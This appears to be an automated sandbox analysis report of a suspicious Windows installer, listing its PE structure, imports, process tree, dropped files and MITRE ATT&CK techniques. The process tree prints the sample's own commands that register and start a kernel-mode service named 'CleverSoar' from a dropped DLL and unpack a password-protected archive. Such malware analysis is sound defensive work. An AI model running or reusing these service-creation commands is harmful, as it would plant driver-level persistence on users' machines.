mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F25DDC1412Ah
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007F25DDC09808h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x11000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x11000	0x11000	ae78e7ec4c172739526732707a28f0f9	False	0.187744140625	data	3.7229388634712897	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb678	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xcc0e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xcc748	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xcca30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0xccb58	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xce180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xcf028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xcf8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xcfe38	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xd1120	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xd5348	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xd78f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xd8998	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_STRING	0xd8e00	0x3f8	data			0.3198818897637795
RT_STRING	0xd91f8	0x2dc	data			0.36475409836065575
RT_STRING	0xd94d4	0x430	data			0.40578358208955223
RT_STRING	0xd9904	0x44c	data			0.38636363636363635
RT_STRING	0xd9d50	0x2d4	data			0.39226519337016574
RT_STRING	0xda024	0xb8	data			0.6467391304347826
RT_STRING	0xda0dc	0x9c	data			0.6410256410256411
RT_STRING	0xda178	0x374	data			0.4230769230769231
RT_STRING	0xda4ec	0x398	data			0.3358695652173913
RT_STRING	0xda884	0x368	data			0.3795871559633027
RT_STRING	0xdabec	0x2a4	data			0.4275147928994083
RT_RCDATA	0xdae90	0x10	data			1.5
RT_RCDATA	0xdaea0	0x310	data			0.6173469387755102
RT_RCDATA	0xdb1b0	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0xdb1dc	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xdb298	0x584	data	English	United States	0.2769121813031161
RT_MANIFEST	0xdb81c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	23:02:15
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Imagebase:	0x9e0000
File size:	8'595'621 bytes
MD5 hash:	F2845D6410A0D9A090D414F3AE742E3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	23:02:16
Start date:	23/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20444,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Imagebase:	0xa10000
File size:	3'366'912 bytes
MD5 hash:	F0D4EEA505CEB561AB4AD622E3C0B9D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	23:02:24
Start date:	23/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	23:02:25
Start date:	23/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$5046E,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Imagebase:	0xac0000
File size:	3'366'912 bytes
MD5 hash:	F0D4EEA505CEB561AB4AD622E3C0B9D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	23:02:27
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Imagebase:	0x7ff674670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	23:02:28
Start date:	23/12/2024
Path:	C:\Program Files (x86)\Windows NT\7zr.exe
Wow64 process (32bit):	true
Commandline:	7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Imagebase:	0x180000
File size:	831'200 bytes
MD5 hash:	84DC4B92D860E8AEA55D12B1E87EA108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	23:02:29
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	42
Start time:	23:02:30
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	64
Start time:	23:02:31
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	82
Start time:	23:02:32
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	91
Start time:	23:02:33
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff674670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.3%
Total number of Nodes:	828
Total number of Limit Nodes:	9

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U5b89#U88c5#U52a9#U624b1.0.1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows NT\7zr.exe

C:\Program Files (x86)\Windows NT\file.bin (copy)

C:\Program Files (x86)\Windows NT\hrsw.vbc

C:\Program Files (x86)\Windows NT\is-18TF5.tmp

C:\Program Files (x86)\Windows NT\is-LHLK8.tmp

C:\Program Files (x86)\Windows NT\locale.bin

C:\Program Files (x86)\Windows NT\locale.dat

C:\Program Files (x86)\Windows NT\locale2.bin

C:\Program Files (x86)\Windows NT\locale2.dat

C:\Program Files (x86)\Windows NT\locale3.bin

C:\Program Files (x86)\Windows NT\locale3.dat

C:\Program Files (x86)\Windows NT\locale4.bin

C:\Program Files (x86)\Windows NT\locale4.dat

C:\Program Files (x86)\Windows NT\locale7.bin

C:\Program Files (x86)\Windows NT\locale7.dat

C:\Program Files (x86)\Windows NT\res.dat

C:\Program Files (x86)\Windows NT\tProtect.dll

C:\Program Files (x86)\Windows NT\task.xml

C:\Program Files (x86)\Windows NT\trash

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jinjejp.ss3.psm1

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.1.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre